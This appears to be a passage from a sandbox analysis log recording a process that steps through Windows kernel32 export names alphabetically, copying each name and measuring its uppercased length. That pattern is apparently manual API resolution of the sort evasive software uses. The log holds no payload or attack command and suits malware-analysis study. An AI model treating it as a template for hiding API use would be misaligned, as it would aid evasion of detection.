[0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0082.225] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0082.225] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0082.225] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0082.225] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0082.226] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0082.226] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0082.226] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0082.226] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0082.226] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0082.226] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0082.226] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0082.226] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0082.226] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0082.226] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0082.226] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0082.226] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.226] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.226] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.226] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.226] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.226] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.226] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.226] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.227] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.227] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.227] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.227] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.227] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.227] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.227] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.227] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.227] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.227] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.227] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.227] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.227] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.227] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.227] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.227] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.227] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.227] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.227] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.227] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.228] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.228] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.228] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.228] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.228] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.228] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.228] lstrlenA (lpString="BEEP") returned 4 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.228] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.228] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.228] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.228] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.228] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.228] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.228] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.228] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.228] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.228] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.228] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.228] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.229] lstrlenA (lpString="CANCELIO") returned 8 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.229] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.229] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.229] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.229] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.229] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.229] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.229] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.229] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.229] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.229] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.229] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.229] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.229] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.229] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.229] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.229] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.229] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.229] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.230] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.230] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.230] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.230] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.230] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.230] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.230] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.230] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.230] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.230] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.230] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.230] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.230] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.230] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.230] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.230] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.230] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.230] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.230] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.230] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.231] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.231] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.231] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.231] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.231] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.231] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.231] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.231] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.231] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.231] lstrlenA (lpString="COPYFILEA") returned 9 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.231] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.231] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.231] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.231] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.231] lstrlenA (lpString="COPYFILEW") returned 9 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.231] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.231] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.231] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.231] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.232] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.232] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.232] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.232] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.232] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.232] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.232] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.232] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.232] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") 